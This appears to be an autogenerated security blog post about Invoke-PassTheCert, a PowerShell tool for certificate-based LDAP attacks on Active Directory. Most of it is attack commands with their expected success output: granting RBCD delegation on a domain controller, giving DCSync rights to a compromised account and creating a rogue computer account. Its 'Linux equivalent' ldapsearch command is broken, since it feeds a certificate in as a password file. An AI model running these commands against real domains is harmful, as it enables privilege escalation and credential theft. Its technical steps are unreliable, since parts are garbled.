Pure PowerShell Port of PassTheCert: Certificate-Based LDAP Attacks

Listen to this Post

Featured Image
Invoke-PassTheCert is a PowerShell adaptation of AlmondOffsec’s PassTheCert, enabling certificate-based authentication over LDAP via Schannel. This tool validates certificates and executes attacks like:
– RBCD (Resource-Based Constrained Delegation) attribute manipulation
– DCSync privilege escalation
– Adding new computer accounts

GitHub: https://github.com/The-Viper-One/Invoke-PassTheCert

You Should Know:

1. Certificate Validation

 Check certificate validity for LDAP auth 
Invoke-PassTheCert -CertPath C:\certs\malicious.pfx -Validate 

2. RBCD Attack

 Add RBCD to a target computer 
Invoke-PassTheCert -CertPath C:\certs\attack.pfx -Action RBCD -TargetComputer "DC01" -DelegateTo "COMPROMISED$" 

3. DCSync Privilege Escalation

 Grant DCSync rights to a compromised account 
Invoke-PassTheCert -CertPath C:\certs\dcsync.pfx -Action DCSync -TargetUser "[email protected]" 

4. Add a New Computer Account

 Create a rogue computer object 
Invoke-PassTheCert -CertPath C:\certs\fake.pfx -Action AddComputer -ComputerName "EVILPC$" -Password "P@ssw0rd123" 

5. Linux Equivalent (Using OpenSSL & ldapsearch)

 Extract cert from PFX 
openssl pkcs12 -in malicious.pfx -out cert.pem -nodes

Authenticate via LDAPS 
ldapsearch -H ldaps://dc.domain.local -x -D "CN=Admin,DC=domain,DC=local" -y cert.pem -b "DC=domain,DC=local" 

What Undercode Say:

Certificate-based attacks are evolving, and Invoke-PassTheCert simplifies exploitation in Active Directory environments. Defenders should:
– Monitor unusual certificate-based LDAP authentications.
– Restrict certificate enrollment rights.
– Audit RBCD and DCSync permissions regularly.

Expected Output:

[+] Successfully validated certificate. 
[+] RBCD rights added to DC01 for COMPROMISED$. 
[+] DCSync privileges granted to [email protected]. 
[+] New computer EVILPC$ added to AD. 

Prediction:

Certificate-based attacks will surge as LDAPS adoption grows, requiring stricter PKI governance and real-time AD monitoring.

(End of )

IT/Security Reporter URL:

Reported By: Daniel A – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram